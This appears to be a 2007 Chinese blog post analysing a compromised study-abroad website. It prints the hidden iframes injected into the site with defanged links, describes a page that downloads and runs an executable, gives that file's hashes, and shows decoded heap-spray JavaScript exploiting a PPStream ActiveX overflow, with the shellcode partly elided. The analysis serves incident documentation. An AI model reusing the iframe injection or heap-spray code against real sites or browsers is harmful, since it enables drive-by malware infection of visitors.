关闭

某留学网站被植入利用 PPStream 堆栈漏洞的代码

1114人阅读 评论(0) 收藏 举报

某留学网站被植入利用 PPStream 堆栈漏洞的代码

endurer 原创
2007-09-30 第1

网站被植入代码:
/---
<iframe src=hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 width=0 height=0></iframe>
---/

hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 包含代码:
/---
<iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/014.htm'></iframe>
<iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/pps.htm'></iframe>
---/

hxxp://xxx.7**45*97**0.com/wm/014.htm 下载 hxxp://down.d*j**7*78*8.cn/eeee.exe,创建 eeee.vbs 来实现运行。

文件说明符 : D:/test/eeee.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-30 17:35:3
修改时间 : 2007-9-30 17:34:56
访问时间 : 2007-9-30 17:36:41
大小 : 18944 字节 18.512 KB
MD5 : 711db0f8a651b3877db9febfa4060cdb
HSA1: ECA7F2889F07E04257575EEEAC9AB30F97EC7311

UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo

hxxp://xxx.7**45*97**0.com/wm/pps.htm 是一段加密过的 PPStream 堆栈漏洞利用代码,解密后为:
/---
var newcode=unescape("%u00E8%u0000%u6A00%uEB……%u776f%u2e6e%u6a64%u3737%u3838%u632e%u2f6e%u7070%u2e73%u7865%u0065");bigblock=unescape("%u9090");headersize=20;slackspace=headersize+newcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;fillblock=bigblock.substring(0,slackspace);block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000)block=block+block+fillblock;memory=new Array();for(x=0;x<400;x++)memory[x]=block+newcode;var buffer='\x0a';while(buffer.length<500)buffer+='\x0a\x0a\x0a\x0a';ppc.Logo=buffer;
---/ 

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:2726525次
    • 积分:38391
    • 等级:
    • 排名:第108名
    • 原创:981篇
    • 转载:40篇
    • 译文:108篇
    • 评论:1561条
    文章存档
    最新评论